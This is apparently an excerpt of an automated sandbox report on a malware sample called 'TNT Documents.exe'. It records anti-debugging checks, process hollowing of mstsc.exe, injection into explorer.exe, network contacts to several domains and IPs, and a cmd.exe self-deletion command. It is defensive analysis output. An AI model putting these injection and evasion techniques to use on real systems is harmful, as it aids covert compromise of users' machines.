Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05685BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0566B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\TNT Documents.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_00409B50 LdrLoadDll,
Source: C:\Users\user\Desktop\TNT Documents.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.metronixmedical.com
Source: C:\Windows\explorer.exe Domain query: www.specialtyplastics.online
Source: C:\Windows\explorer.exe Network Connect: 51.255.30.106 80
Source: C:\Windows\explorer.exe Network Connect: 119.18.54.99 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.cortepuroiberico.com
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80
Source: C:\Windows\explorer.exe Domain query: www.coached.info
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\TNT Documents.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: EC0000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Users\user\Desktop\TNT Documents.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\TNT Documents.exe Memory written: C:\Users\user\Desktop\TNT Documents.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\TNT Documents.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\TNT Documents.exe Thread register set: target process: 3292
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 3292
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Users\user\Desktop\TNT Documents.exe Process created: C:\Users\user\Desktop\TNT Documents.exe {path}
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TNT Documents.exe"
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.319293642.0000000005F40000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.316085320.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.295462670.0000000001400000.00000002.00020000.sdmp, explorer.exe, 0000000B.00000000.336652240.0000000001400000.00000002.00020000.sdmp, mstsc.exe, 00000011.00000002.524622785.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.336206590.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.314892260.0000000000EB8000.00000004.00000020.sdmp, explorer.exe, 0000000B.00000000.294735677.0000000000EB8000.00000004.00000020.sdmp Binary or memory string: ProgmanX
Source: explorer.exe, 0000000B.00000000.344277023.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.323053985.0000000008ACF000.00000004.00000001.sdmp, explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndAj
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Users\user\Desktop\TNT Documents.exe VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\TNT Documents.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
